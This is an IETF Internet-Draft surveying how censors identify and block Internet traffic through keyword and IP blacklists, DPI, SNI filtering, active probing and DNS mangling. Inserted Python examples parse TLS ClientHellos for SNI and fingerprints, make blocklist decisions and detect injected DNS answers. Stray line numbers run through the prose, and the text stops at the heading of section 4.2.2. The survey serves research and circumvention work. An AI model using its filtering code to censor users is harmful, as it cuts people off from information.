Network Working Group                                            J. Hall
Internet-Draft                                                       CDT
Intended status: Informational                                  M. Aaron
Expires: February 24, 2020                                    CU Boulder
                                                                S. Adams
                                                                     CDT
                                                                B. Jones
                                                             N. Feamster
                                                               Princeton
                                                         August 23, 2019

              A Survey of Worldwide Censorship Techniques
                     draft-irtf-pearg-censorship-00

Abstract

   This document describes the technical mechanisms used by censorship regimes around the world to block or impair Internet traffic. It aims to make designers, implementers, and users of Internet protocols aware of the properties being exploited and the mechanisms used to censor end-user access to information. This document makes no suggestions on individual protocol considerations, and is purely informational, intended to be a reference.

Status of This Memo

   This Internet-Draft is submitted in full conformance with the provisions of BCP 78 and BCP 79.

   Internet-Drafts are working documents of the Internet Engineering Task Force (IETF). Note that other groups may also distribute working documents as Internet-Drafts. The list of current Internet-Drafts is at https://datatracker.ietf.org/drafts/current/.

   Internet-Drafts are draft documents valid for a maximum of six months and may be updated, replaced, or obsoleted by other documents at any time. It is inappropriate to use Internet-Drafts as reference material or to cite them other than as "work in progress."

   This Internet-Draft will expire on February 24, 2020.

Copyright Notice

   Copyright (c) 2019 IETF Trust and the persons identified as the document authors. All rights reserved.

   This document is subject to BCP 78 and the IETF Trust's Legal Provisions Relating to IETF Documents (https://trustee.ietf.org/license-info) in effect on the date of publication of this document. Please review these documents carefully, as they describe your rights and restrictions with respect to this document. Code Components extracted from this document must include Simplified BSD License text as described in Section 4.e of the Trust Legal Provisions and are provided without warranty as described in the Simplified BSD License.

Table of Contents

   1.  Introduction
   2.  Technical Prescription
   3.  Technical Identification
     3.1.  Points of Control
     3.2.  Application Layer
       3.2.1.  HTTP Request Header Identification
       3.2.2.  HTTP Response Header Identification
       3.2.3.  Instrumenting Content Providers
       3.2.4.  Deep Packet Inspection (DPI) Identification
     3.3.  Transport Layer
       3.3.1.  Shallow Packet Inspection and TCP/IP Header Identification
       3.3.2.  Protocol Identification
   4.  Technical Interference
     4.1.  Application Layer
       4.1.1.  DNS Interference
     4.2.  Transport Layer
       4.2.1.  Performance Degradation
       4.2.2.  Packet Dropping
       4.2.3.  RST Packet Injection
     4.3.  Multi-layer and Non-layer
       4.3.1.  Distributed Denial of Service (DDoS)
       4.3.2.  Network Disconnection or Adversarial Route Announcement
   5.  Non-Technical Prescription
   6.  Non-Technical Interference
     6.1.  Self-Censorship
     6.2.  Domain Name Reallocation
     6.3.  Server Takedown
     6.4.  Notice and Takedown
   7.  Contributors
   8.  Informative References
   Authors' Addresses

1.  Introduction

   Censorship is where an entity in a position of power - such as a government, organization, or individual - suppresses communication that it considers objectionable, harmful, sensitive, politically incorrect or inconvenient. (Although censors that engage in censorship must do so through legal, military, or other means, this document focuses largely on the technical mechanisms used to achieve network censorship.)

   This document describes the technical mechanisms that censorship regimes around the world use to block or degrade Internet traffic (see [RFC7754] for a discussion of Internet blocking and filtering in terms of implications for Internet architecture, rather than end-user access to content and services).

   We describe three elements of Internet censorship: prescription, identification, and interference. Prescription is the process by which censors determine what types of material they should block, e.g. they decide to block a list of pornographic websites. Identification is the process by which censors classify specific traffic to be blocked or impaired, e.g. the censor blocks or impairs all webpages containing "sex" in the title or traffic to www.sex.example. Interference is the process by which the censor intercedes in communication and prevents access to censored materials by blocking access or impairing the connection.

2.  Technical Prescription

   Prescription is the process of figuring out what censors would like to block [Glanville-2008]. Generally, censors aggregate information "to block" in blacklists or using real-time heuristic assessment of content [Ding-1999]. There are indications that online censors are starting to use machine learning techniques as well [Tang-2016].

   There are typically three types of blacklists: keyword, domain name, or Internet Protocol (IP) address. Keyword and domain name blocking take place at the application level (e.g. HTTP), whereas IP blocking tends to take place using routing data in TCP/IP headers. The mechanisms for building up these blacklists are varied. Censors can purchase "content control" software from private industry, such as SmartFilter, which allows filtering from broad categories that they would like to block, such as gambling or pornography. In these cases, these private services attempt to categorize every semi-questionable website so as to allow for meta-tag blocking (similarly, they tune real-time content heuristic systems to map their assessments onto categories of objectionable content).

   Countries that are more interested in retaining specific political control, a desire which requires swift and decisive action, often have ministries or organizations, such as the Ministry of Industry and Information Technology in China or the Ministry of Culture and Islamic Guidance in Iran, which maintain their own blacklists.

3.  Technical Identification

3.1.  Points of Control

   Internet censorship, necessarily, takes place over a network. Network design gives censors a number of different points-of-control where they can identify the content they are interested in filtering. An important aspect of pervasive technical interception is the necessity to rely on software or hardware to intercept the content the censor is interested in. This requirement, the need to have the interception mechanism located somewhere, logically or physically, implicates various general points-of-control:

   o  *Internet Backbone:* If a censor controls the gateways into a region, they can filter undesirable traffic that is traveling into and out of the region by packet sniffing and port mirroring at the relevant exchange points. Censorship at this point of control is most effective at controlling the flow of information between a region and the rest of the Internet, but is ineffective at identifying content traveling between the users within a region.

   o  *Internet Service Providers:* Internet Service Providers are perhaps the most natural point of control. They have the benefit of being easily enumerable by a censor, paired with the ability to identify the regional and international traffic of all their users. The censor's filtration mechanisms can be placed on an ISP via governmental mandates, ownership, or voluntary/coercive influence.

   o  *Institutions:* Private institutions such as corporations, schools, and cyber cafes can put filtration mechanisms in place. These mechanisms are occasionally at the request of a censor, but are more often implemented to help achieve institutional goals, such as to prevent the viewing of pornography on school computers.

   o  *Personal Devices:* Censors can mandate that censorship software be installed at the device level. This has many disadvantages in terms of scalability, ease-of-circumvention, and operating system requirements. The emergence of mobile devices exacerbates these feasibility problems.

   o  *Services:* Application service providers can be pressured, coerced, or legally required to censor specific content or flows of data. Service providers naturally face incentives to maximize their potential customer base, and potential service shutdowns or legal liability due to censorship efforts may seem much less attractive than potentially excluding content, users, or uses of their service.

   o  *Certificate Authorities:* Authorities that issue cryptographically secured resources can be a significant point of control. Certificate Authorities that issue certificates to domain holders for TLS/HTTPS, or Regional/Local Internet Registries that issue Route Origination Authorizations to BGP operators, can be forced to issue rogue certificates that may allow compromises in confidentiality guarantees - allowing censorship software to engage in identification and interference where not possible before - or integrity guarantees - allowing, for example, adversarial routing of traffic.

   o  *Content Distribution Networks (CDNs):* CDNs seek to collapse network topology in order to locate content closer to the service's users and so improve quality of service. These can be powerful points of control for censors, especially if the location of a CDN results in easier interference.

   At all levels of the network hierarchy, the filtration mechanisms used to detect undesirable traffic are essentially the same: a censor sniffs transmitted packets and identifies undesirable content, and then uses a blocking or shaping mechanism to prevent or impair access. Identification of undesirable traffic can occur at the application, transport, or network layer of the IP stack. Censors are almost always concerned with web traffic, so the relevant protocols tend to be filtered in predictable ways. For example, a subversive image would always make it past a keyword filter, but the IP address of the site serving the image may be blacklisted when identified as a provider of undesirable content.

3.2.  Application Layer

3.2.1.  HTTP Request Header Identification

   An HTTP header contains a lot of useful information for traffic identification; although "host" is the only required field in an HTTP request header (for HTTP/1.1 and later), an HTTP method field is necessary to do anything useful. As such, "method" and "host" are the two fields used most often for ubiquitous censorship. A censor can sniff traffic and identify a specific domain name (host) and usually a page name (GET /page) as well. This identification technique is usually paired with TCP/IP header identification (see Section 3.3.1) for a more robust method.

   *Tradeoffs:* Request Identification is a technically straightforward identification method that can be easily implemented at the Backbone or ISP level. The hardware needed for this sort of identification is cheap and easy to acquire, making it desirable when budget and scope are a concern. HTTPS will encrypt the relevant request and response fields, so pairing with TCP/IP identification (see Section 3.3.1) is necessary for filtering of HTTPS. However, some countermeasures such as URL obfuscation [RSF-2005] can trivially defeat simple forms of HTTP Request Header Identification.

   *Empirical Examples:* Studies exploring censorship mechanisms have found evidence of HTTP header/URL filtering in many countries, including Bangladesh, Bahrain, China, India, Iran, Malaysia, Pakistan, Russia, Saudi Arabia, South Korea, Thailand, and Turkey [Verkamp-2012] [Nabi-2013] [Aryan-2012]. Commercial technologies such as the McAfee SmartFilter and NetSweeper are often purchased by censors [Dalek-2013]. These commercial technologies use a combination of HTTP Request Identification and TCP/IP Header Identification to filter specific URLs. Dalek et al. and Jones et al. identified the use of these products in the wild [Dalek-2013] [Jones-2014].

3.2.2.  HTTP Response Header Identification

   While HTTP Request Header Identification relies on the information contained in the HTTP request from client to server, response identification uses information sent in response by the server to the client to identify undesirable content.

   *Tradeoffs:* As with HTTP Request Header Identification, the techniques used to identify HTTP traffic are well-known, cheap, and relatively easy to implement, but are made useless by HTTPS, because the response in HTTPS is encrypted, including headers.

   The response fields are also less helpful for identifying content than request fields, as "Server" could easily be identified using HTTP Request Header identification, and "Via" is rarely relevant. HTTP Response censorship mechanisms normally let the first n packets through while the mirrored traffic is being processed; this may allow some content through, and the user may be able to detect that the censor is actively interfering with undesirable content.

   *Empirical Examples:* In 2009, Jong Park et al. at the University of New Mexico demonstrated that the Great Firewall of China (GFW) has used this technique [Crandall-2010]. However, Jong Park et al. found that the GFW discontinued this practice during the course of the study. Due to the overlap in HTTP response filtering and keyword filtering (see Section 3.2.3), it is likely that most censors rely on keyword filtering over TCP streams instead of HTTP response filtering.

3.2.3.  Instrumenting Content Providers

   In addition to censorship by the state, many governments pressure content providers to censor themselves. Due to the extensive reach of government censorship, we need to define content provider as any service that provides utility to users, including everything from web sites to locally installed programs.
   The defining factor of keyword identification by content providers is the choice of content providers to detect restricted terms on their platform. The terms to look for may be provided by the government, or the content provider may be expected to come up with their own list.

   *Tradeoffs:* By instrumenting content providers to identify restricted content, the censor can gain new information at the cost of political capital with the companies it forces or encourages to participate in censorship. For example, the censor can gain insight about the content of encrypted traffic by coercing web sites to identify restricted content, but this may drive away potential investment. Coercing content providers may encourage self-censorship, an additional advantage for censors. The tradeoffs for instrumenting content providers are highly dependent on the content provider and the requested assistance.

   *Empirical Examples:* Researchers have discovered keyword identification by content providers on platforms ranging from instant messaging applications [Senft-2013] to search engines [Rushe-2015] [Cheng-2010] [Whittaker-2013] [BBC-2013] [Condliffe-2013]. To demonstrate the prevalence of this type of keyword identification, we look to search engine censorship.

   Search engine censorship demonstrates keyword identification by content providers and can be regional or worldwide. Implementation is occasionally voluntary, but normally is based on the laws and regulations of the country a search engine is operating in. The keyword blacklists are most likely maintained by the search engine provider. China is known to require search engine providers to "voluntarily" maintain search term blacklists to acquire/keep an Internet content provider (ICP) license [Cheng-2010]. It is clear these blacklists are maintained by each search engine provider, based on the slight variations in the intercepted searches [Zhu-2011] [Whittaker-2013]. The United Kingdom has been pushing search engines to self-censor with the threat of litigation if they don't do it themselves: Google and Microsoft have agreed to block more than 100,000 queries in the U.K. to help combat abuse [BBC-2013] [Condliffe-2013].

   Depending on the output, search engine keyword identification may be difficult or easy to detect. In some cases specialized or blank results provide a trivial enumeration mechanism, but more subtle censorship can be difficult to detect. In February 2015, Microsoft's search engine, Bing, was accused of censoring Chinese content outside of China [Rushe-2015] because Bing returned different results for censored terms in Chinese and English. However, it is possible that censorship of the largest base of Chinese search users, China, biased Bing's results so that the more popular results in China (the uncensored results) were also more popular for Chinese speakers outside of China.

3.2.4.  Deep Packet Inspection (DPI) Identification

   Deep Packet Inspection has become computationally feasible as a censorship mechanism in recent years [Wagner-2009]. Unlike other techniques, DPI reassembles network flows to examine the application "data" section, as opposed to only the header, and is therefore often used for keyword identification. DPI also differs from other identification technologies because it can leverage additional packet and flow characteristics, e.g. packet sizes and timings, to identify content. To prevent substantial quality of service (QoS) impacts, DPI normally analyzes a copy of the data while the original packets continue to be routed. Typically, the traffic is split using either a mirror switch or a fiber splitter, and analyzed on a cluster of machines running Intrusion Detection Systems (IDS) configured for censorship.

   *Tradeoffs:* DPI is one of the most expensive identification mechanisms and can have a large QoS impact [Porter-2010]. When used as a keyword filter for TCP flows, DPI systems can also cause major overblocking problems. Like other techniques, DPI is less useful against encrypted data, though DPI can leverage unencrypted elements of an encrypted data flow (e.g., the Server Name Indication (SNI) sent in the clear for TLS) or statistical information about an encrypted flow (e.g., video takes more bandwidth than audio or textual forms of communication) to identify traffic.

   Other kinds of information can be inferred by comparing certain unencrypted elements exchanged during TLS handshakes to similar data points from known sources. This practice, called TLS fingerprinting, allows a probabilistic identification of a party's operating system, browser, or application based on a comparison of the specific combinations of TLS version, ciphersuites, compression options, etc. sent in the ClientHello message to similar signatures found in unencrypted traffic [Husak-2016].

   Despite these problems, DPI is the most powerful identification method and is widely used in practice. The Great Firewall of China (GFW), the largest censorship system in the world, has used DPI to identify restricted content over HTTP and DNS and inject TCP RSTs and bad DNS responses, respectively, into connections [Crandall-2010] [Clayton-2006] [Anonymous-2014].

   *Empirical Examples:* Several studies have found evidence of DPI being used to censor content and tools. Clayton et al., Crandall et al., Anonymous, and Khattak et al. all explored the GFW, and Khattak et al. even probed the firewall to discover implementation details like how much state it stores [Crandall-2010] [Clayton-2006] [Anonymous-2014] [Khattak-2013]. The Tor project claims that China, Iran, Ethiopia, and others must have used DPI to block the obfs2 protocol [Wilde-2012]. Malaysia has been accused of using targeted DPI, paired with DDoS, to identify and subsequently knock out pro-opposition material [Wagstaff-2013]. It also seems likely that organizations not so worried about blocking content in real-time could use DPI to sort and categorically search gathered traffic using technologies such as NarusInsight [Hepting-2011].

3.2.4.1.  Server Name Indication

   In encrypted connections using Transport Layer Security (TLS), there may be servers that host multiple "virtual servers" at a given network address, and the client will need to specify in the (unencrypted) ClientHello message which domain name it seeks to connect to (so that the server can respond with the appropriate TLS certificate) using the Server Name Indication (SNI) TLS extension [RFC6066]. Since SNI is sent in the clear, censors and filtering software can use it as a basis for blocking, filtering, or impairment by dropping connections to domains that match prohibited content (e.g., bad.foo.example may be censored while good.foo.example is not) [Shbair-2015].

   Domain fronting has been one popular way to avoid identification by censors [Fifield-2015]. To avoid identification by censors, applications using domain fronting put a different domain name in the SNI extension than the one encrypted by HTTPS. The visible SNI would indicate an unblocked domain, while the blocked domain remains hidden in the encrypted application header. Some encrypted messaging services relied on domain fronting to enable their provision in countries employing SNI-based filtering.
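   As an added example (it is not code from the draft), the following Python parses the unencrypted part of a TLS ClientHello the way the DPI systems of Section 3.2.4 and the SNI filters of this section read it: it extracts the SNI host name, builds the version/cipher-suite/extension/group list that TLS fingerprinting compares (a JA3-style string; JA3 also appends the EC point formats field, omitted here), and shows the tradeoff that a client sending no SNI gives an SNI-based filter nothing to match on. build_client_hello() constructs sample messages for the test; the host names and the blocklist are made up.

```python
import struct
from typing import Dict, Optional


def build_client_hello(server_name: Optional[str]) -> bytes:
    """Construct a minimal TLS ClientHello record (sample data, not a capture).
    server_name=None models a client that sends no SNI extension at all."""
    extensions = b""
    if server_name is not None:
        host = server_name.encode("ascii")
        entry = b"\x00" + struct.pack("!H", len(host)) + host      # name_type 0 = host_name
        sni_list = struct.pack("!H", len(entry)) + entry
        extensions += struct.pack("!HH", 0x0000, len(sni_list)) + sni_list
    groups = struct.pack("!HHH", 4, 0x001D, 0x0017)                # supported_groups: x25519, secp256r1
    extensions += struct.pack("!HH", 0x000A, len(groups)) + groups
    body = (
        b"\x03\x03"                                    # client_version: TLS 1.2
        + bytes(32)                                    # random (zeros in this sample)
        + b"\x00"                                      # empty session_id
        + struct.pack("!H", 4) + b"\x13\x01\xC0\x2F"   # cipher_suites: 0x1301, 0xC02F
        + b"\x01\x00"                                  # compression_methods: null only
        + struct.pack("!H", len(extensions)) + extensions
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def parse_client_hello(record: bytes) -> Optional[Dict]:
    """Read the cleartext fields a DPI box can see; None if this is not a ClientHello or is truncated."""
    try:
        if record[0] != 0x16 or record[5] != 0x01:     # handshake record carrying a ClientHello
            return None
        pos = 9                                         # past record (5) and handshake (4) headers
        version = struct.unpack_from("!H", record, pos)[0]
        pos += 2 + 32                                   # version + random
        pos += 1 + record[pos]                          # session_id
        cs_len = struct.unpack_from("!H", record, pos)[0]
        pos += 2
        ciphers = list(struct.unpack_from("!%dH" % (cs_len // 2), record, pos))
        pos += cs_len
        pos += 1 + record[pos]                          # compression_methods
        info = {"version": version, "ciphers": ciphers, "extensions": [], "sni": None, "groups": []}
        if pos >= len(record):                          # no extensions block (older clients)
            return info
        ext_len = struct.unpack_from("!H", record, pos)[0]
        pos += 2
        end = pos + ext_len
        if end > len(record):
            return None
        while pos + 4 <= end:
            etype, elen = struct.unpack_from("!HH", record, pos)
            pos += 4
            data = record[pos:pos + elen]
            if len(data) != elen:
                return None
            info["extensions"].append(etype)
            if etype == 0x0000:                         # server_name: list of (type, len, name)
                p = 2                                   # skip server_name_list length
                while p + 3 <= len(data):
                    name_type, name_len = data[p], struct.unpack_from("!H", data, p + 1)[0]
                    if name_type == 0:
                        info["sni"] = data[p + 3:p + 3 + name_len].decode("ascii")
                        break
                    p += 3 + name_len
            elif etype == 0x000A:                       # supported_groups
                n = struct.unpack_from("!H", data, 0)[0] // 2
                info["groups"] = list(struct.unpack_from("!%dH" % n, data, 2))
            pos += elen
        return info
    except (IndexError, struct.error, UnicodeDecodeError):
        return None


def extract_sni(record: bytes) -> Optional[str]:
    info = parse_client_hello(record)
    return info["sni"] if info else None


def ja3_style_fingerprint(record: bytes) -> Optional[str]:
    """version,ciphers,extensions,groups as decimal lists; a hash of this string is what a
    fingerprint database (browser X, tool Y) is matched against."""
    info = parse_client_hello(record)
    if info is None:
        return None
    return ",".join([str(info["version"]),
                     "-".join(map(str, info["ciphers"])),
                     "-".join(map(str, info["extensions"])),
                     "-".join(map(str, info["groups"]))])


def sni_filter_decision(record: bytes, blocked: set) -> str:
    """What an SNI-based filter can conclude about one connection: 'blocked', 'allowed',
    or 'no-sni' when the client sent no server name and the method has nothing to match."""
    host = extract_sni(record)
    if host is None:
        return "no-sni"
    return "blocked" if host in blocked else "allowed"


if __name__ == "__main__":
    hello = build_client_hello("bad.foo.example")
    print(extract_sni(hello), ja3_style_fingerprint(hello))
    print(sni_filter_decision(build_client_hello(None), {"bad.foo.example"}))
```

   The exact-match lookup in sni_filter_decision() is deliberate: matching on a parent domain would make the populardomain.example overblocking described in the tradeoffs below the default behaviour rather than a misconfiguration.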
These services used the 428 cover provided by domains for which blocking at the domain level 429 would be undesirable to hide their true domain names. However, the 430 companies holding the most popular domains have since reconfigured 431 their software to prevent this practice. It may be possible to 432 achieve similar results using potential future options to encrypt SNI 433 in TLS 1.3. 435 *Tradeoffs:* Some clients do not send the SNI extension (e.g., 436 clients that only support versions of SSL and not TLS) or will fall 437 back to SSL if a TLS connection fails, rendering this method 438 ineffective. In addition, this technique requires deep packet 439 inspection techniques that can be computationally and 440 infrastructurally expensive and improper configuration of an SNI- 441 based block can result in significant overblocking, e.g., when a 442 second-level domain like populardomain.example is inadvertently 443 blocked. In the case of encrypted SNI, pressure to censor may 444 transfer to other points of intervention, such as content and 445 application providers. 447 *Empirical Examples:* While there are many examples of security firms 448 that offer SNI-based filtering [Trustwave-2015] [Sophos-2015] 449 [Shbair-2015], the government of South Korea was recently observed 450 using SNI-based filtering. Cite to Gatlan 451 https://www.bleepingcomputer.com/news/security/south-korea-is- 452 censoring-the-internet-by-snooping-on-sni-traffic/ 454 3.3. Transport Layer 456 3.3.1. Shallow Packet Inspection and TCP/IP Header Identification 458 Of the various shallow packet inspection methods, TCP/IP Header 459 Identification is the most pervasive, reliable, and predictable type 460 of identification. TCP/IP headers contain a few invaluable pieces of 461 information that must be transparent for traffic to be successfully 462 routed: destination and source IP address and port. 
Destination and 463 Source IP are doubly useful, as not only does it allow a censor to 464 block undesirable content via IP blacklisting, but also allows a 465 censor to identify the IP of the user making the request. Port is 466 useful for whitelisting certain applications. 468 *Trade-offs:* TCP/IP identification is popular due to its simplicity, 469 availability, and robustness. 471 TCP/IP identification is trivial to implement, but is difficult to 472 implement in backbone or ISP routers at scale, and is therefore 473 typically implemented with DPI. Blacklisting an IP is equivalent to 474 installing a /32 route on a router and due to limited flow table 475 space, this cannot scale beyond a few thousand IPs at most. IP 476 blocking is also relatively crude, leading to overblocking, and 477 cannot deal with some services like Content Distribution Networks 478 (CDN), that host content at hundreds or thousands of IP addresses. 479 Despite these limitations, IP blocking is extremely effective because 480 the user needs to proxy their traffic through another destination to 481 circumvent this type of identification. 483 Port-blocking is generally not useful because many types of content 484 share the same port and it is possible for censored applications to 485 change their port. For example, most HTTP traffic goes over port 80, 486 so the censor cannot differentiate between restricted and allowed 487 content solely on the basis of port. Port whitelisting is 488 occasionally used, where a censor limits communication to approved 489 ports, such as 80 for HTTP traffic and is most effective when used in 490 conjunction with other identification mechanisms. For example, a 491 censor could block the default HTTPS port, port 443, thereby forcing 492 most users to fall back to HTTP. 494 3.3.2. Protocol Identification 496 Censors sometimes identify entire protocols to be blocked using a 497 variety of traffic characteristics. 
For example, Iran impairs the 498 performance of HTTPS traffic, a protocol that prevents further 499 analysis, to encourage users to switch to HTTP, a protocol that they 500 can analyze [Aryan-2012]. A simple protocol identification would be 501 to recognize all TCP traffic over port 443 as HTTPS, but more 502 sophisticated analysis of the statistical properties of payload data 503 and flow behavior, would be more effective, even when port 443 is not 504 used [Hjelmvik-2010] [Sandvine-2014]. 506 If censors can detect circumvention tools, they can block them, so 507 censors like China are extremely interested in identifying the 508 protocols for censorship circumvention tools. In recent years, this 509 has devolved into an arms race between censors and circumvention tool 510 developers. As part of this arms race, China developed an extremely 511 effective protocol identification technique that researchers call 512 active probing or active scanning. 514 In active probing, the censor determines whether hosts are running a 515 circumvention protocol by trying to initiate communication using the 516 circumvention protocol. If the host and the censor successfully 517 negotiate a connection, then the censor conclusively knows that host 518 is running a circumvention tool. China has used active scanning to 519 great effect to block Tor [Winter-2012]. 521 *Trade-offs:* Protocol Identification necessarily only provides 522 insight into the way information is traveling, and not the 523 information itself. 525 Protocol identification is useful for detecting and blocking 526 circumvention tools, like Tor, or traffic that is difficult to 527 analyze, like VoIP or SSL, because the censor can assume that this 528 traffic should be blocked. However, this can lead to over-blocking 529 problems when used with popular protocols. 
These methods are expensive, both computationally and financially, due to the use of statistical analysis, and can be ineffective due to their imprecise nature.

*Empirical Examples:* Protocol identification can be easy to detect if it is conducted in real time and only a particular protocol is blocked, but some types of protocol identification, like active scanning, are much more difficult to detect. Protocol identification has been used by Iran to identify and throttle SSH traffic to make it unusable [Anonymous-2007] and by China to identify and block Tor relays [Winter-2012]. Protocol Identification has also been used for traffic management, such as the 2007 case where Comcast in the United States used RST injection to interrupt BitTorrent traffic [Winter-2012].

4. Technical Interference

4.1. Application Layer

4.1.1. DNS Interference

There are a variety of mechanisms that censors can use to block or filter access to content by altering responses from the DNS [AFNIC-2013] [ICANN-SSAC-2012], including blocking the response, replying with an error message, or responding with an incorrect address.

"DNS mangling" is a network-level technique where an incorrect IP address is returned in response to a DNS query for a censored destination. An example of this is what some Chinese networks do (we are not aware of any other wide-scale uses of mangling). On those Chinese networks, every DNS request in transit is examined (presumably by network inspection technologies such as DPI) and, if it matches a censored domain, a false response is injected. End users can see this technique in action by simply sending DNS requests to any unused IP address in China (see the example below). If it is not a censored name, there will be no response. If it is censored, an erroneous response will be returned. For example, using the command-line dig utility to query an unused IP address in China of 192.0.2.2 for the name "www.uncensored.example" compared with "www.censored.example" (censored at the time of writing), we get an erroneous IP address "198.51.100.0" as a response:

   % dig +short +nodnssec @192.0.2.2 A www.uncensored.example
   ;; connection timed out; no servers could be reached

   % dig +short +nodnssec @192.0.2.2 A www.censored.example
   198.51.100.0

There are also cases of what is colloquially called "DNS lying", where a censor mandates that the DNS responses provided - by an operator of a recursive resolver such as an Internet access provider - be different than what authoritative resolvers would provide [Bortzmayer-2015].

DNS cache poisoning refers to a mechanism where a censor interferes with the response sent by an authoritative DNS resolver to a recursive resolver by responding, more quickly than the authoritative resolver can, with an alternative IP address [Halley-2008]. Cache poisoning occurs after the requested site's name servers resolve the request and attempt to forward the true IP back to the requesting device; on the return route the resolved IP is recursively cached by each DNS server that initially forwarded the request. During this caching process, if an undesirable keyword is recognized, the resolved IP is "poisoned" and an alternative IP (or NXDOMAIN error) is returned more quickly than the upstream resolver can respond, causing an erroneous IP address to be cached (and potentially recursively so). The alternative IPs usually direct to a nonsense domain or a warning page. Alternatively, Iranian censorship appears to prevent the communication en route, preventing a response from ever being sent [Aryan-2012].
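The dig test above can be reproduced and interpreted programmatically. The Python below is an added example, not part of the draft: it builds the same A query (no DNSSEC OK bit), sends it to a chosen address, and classifies the outcome the way the draft describes, where silence means the name is not censored and any answer from an address that runs no resolver means a response was injected. The server address, names and the constructed reply are illustrative; only `probe` needs network access.

```python
"""Probe-and-classify helper for the DNS mangling test described above.
Added example, not from the draft; server address, names and the
constructed reply below are illustrative."""
import random
import socket
import struct

QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    """Dotted hostname -> DNS wire format (length-prefixed labels, zero terminator)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in labels) + b"\x00"


def build_query(name, txid):
    """Recursive A query; no EDNS/DO bit, matching 'dig +nodnssec'."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD=1, QDCOUNT=1
    return header + encode_name(name) + struct.pack(">HH", QTYPE_A, QCLASS_IN)


def skip_name(msg, off):
    """Offset just past a (possibly compressed) name that starts at off."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:          # compression pointer is 2 bytes and ends the name
            return off + 2
        off += 1 + length


def parse_a_records(resp, expected_txid):
    """Return (txid_matches, rcode, [A record addresses]) for a raw response."""
    if len(resp) < 12:
        return False, -1, []
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", resp[:12])
    rcode, off, ips = flags & 0x000F, 12, []
    for _ in range(qd):
        off = skip_name(resp, off) + 4     # QTYPE + QCLASS
    for _ in range(an):
        off = skip_name(resp, off)
        rtype, rclass, _ttl, rdlen = struct.unpack(">HHIH", resp[off:off + 10])
        off += 10
        if rtype == QTYPE_A and rclass == QCLASS_IN and rdlen == 4:
            ips.append(socket.inet_ntoa(resp[off:off + 4]))
        off += rdlen
    return txid == expected_txid, rcode, ips


def classify(resp, expected_txid):
    """Interpret what came back from a query aimed at an address that runs no resolver."""
    if resp is None:
        return "no response (expected when nothing answers at that address)"
    txid_ok, rcode, ips = parse_a_records(resp, expected_txid)
    if not txid_ok:
        return "reply ignored: malformed or transaction ID mismatch"
    if ips:
        return "injected answer: " + ", ".join(ips)
    return "injected error: rcode %d" % rcode


def probe(name, server, timeout=3.0):
    """Send one UDP query and classify the outcome; needs network access."""
    txid = random.randrange(0, 1 << 16)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, txid), (server, 53))
        try:
            resp, _ = s.recvfrom(4096)
        except socket.timeout:
            resp = None
    return classify(resp, txid)


def constructed_response(query, ip, rcode=0):
    """Constructed test data: a reply to `query` carrying one A record (or none)."""
    txid = struct.unpack(">H", query[:2])[0]
    ancount = 1 if ip else 0
    header = struct.pack(">HHHHHH", txid, 0x8180 | rcode, 1, ancount, 0, 0)  # QR, RD, RA
    answer = b""
    if ip:
        answer = (b"\xC0\x0C"                                 # pointer to the question name
                  + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, 60, 4)
                  + socket.inet_aton(ip))
    return header + query[12:] + answer


if __name__ == "__main__":
    txid = 0x1234
    q = build_query("www.censored.example", txid)
    print(classify(None, txid))                                        # the uncensored case
    print(classify(constructed_response(q, "198.51.100.0"), txid))    # the censored case
    # probe("www.censored.example", "192.0.2.2") would run the draft's dig test live
```

Checking the transaction ID only filters stray or late replies; an on-path injector saw the query and will echo the ID, which is why the draft's test relies on the absence of any legitimate responder rather than on message validation.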
*Trade-offs:* These forms of DNS interference require the censor to force a user to traverse a controlled DNS hierarchy (or an intervening network on which the censor acts as an Active Pervasive Attacker [RFC7624] to rewrite DNS responses) for the mechanism to be effective. It can be circumvented by a technically savvy user who opts to use alternative DNS resolvers (such as the public DNS resolvers provided by Google, OpenDNS, Telecomix, or FDN) or Virtual Private Network technology. DNS mangling and cache poisoning also imply returning an incorrect IP to those attempting to resolve a domain name, but in some cases the destination may be technically accessible; over HTTP, for example, the user may have another method of obtaining the IP address of the desired site and may be able to access it if the site is configured to be the default server listening at this IP address. Target blocking has also been a problem, as occasionally users outside of the censor's region will be directed through DNS servers or DNS-rewriting network equipment controlled by a censor, causing the request to fail. The ease of circumvention paired with the large risk of content blocking and target blocking make DNS interference a partial, difficult, and less than ideal censorship mechanism. Additionally, the above mechanisms rely on DNSSEC not being deployed or DNSSEC validation not being active on the client or recursive resolver.

*Empirical Examples:* DNS interference, when properly implemented, is easy to identify based on the shortcomings identified above. Turkey relied on DNS interference for its country-wide block of websites such as Twitter and YouTube for almost a week in March of 2014, but the ease of circumvention resulted in an increase in the popularity of Twitter until Turkish ISPs implemented an IP blacklist to achieve the governmental mandate [Zmijewki-2014]. Ultimately, Turkish ISPs started hijacking all requests to Google and Level 3's international DNS resolvers [Zmijewki-2014]. DNS interference, when incorrectly implemented, has resulted in some of the largest "censorship disasters". In January 2014, China started directing all requests passing through the Great Firewall to a single domain, dongtaiwang.com, due to an improperly configured DNS poisoning attempt; this incident is thought to be the largest Internet-service outage in history [AFP-2014] [Anon-SIGCOMM12]. Countries such as China, Iran, Turkey, and the United States have discussed blocking entire TLDs as well, but only Iran has acted by blocking all Israeli (.il) domains [Albert-2011].

4.2. Transport Layer

4.2.1. Performance Degradation

While other interference techniques outlined in this section mostly focus on blocking or preventing access to content, it can be an effective censorship strategy in some cases to not entirely block access to a given destination or service but instead degrade the performance of the relevant network connection. The resulting user experience for a site or service under performance degradation can be so bad that users opt to use a different site, service, or method of communication, or may not engage in communication at all if there are no alternatives. Traffic shaping techniques that rate-limit the bandwidth available to certain types of traffic are one example of performance degradation.

*Trade-offs:* While implementing a performance degradation will not always eliminate the ability of people to access a desired resource, it may force them to use other means of communication where censorship (or surveillance) is more easily accomplished.

*Empirical Examples:* Iran has been known to shape the bandwidth available to HTTPS traffic to encourage unencrypted HTTP traffic [Aryan-2012].

4.2.2. Packet Dropping

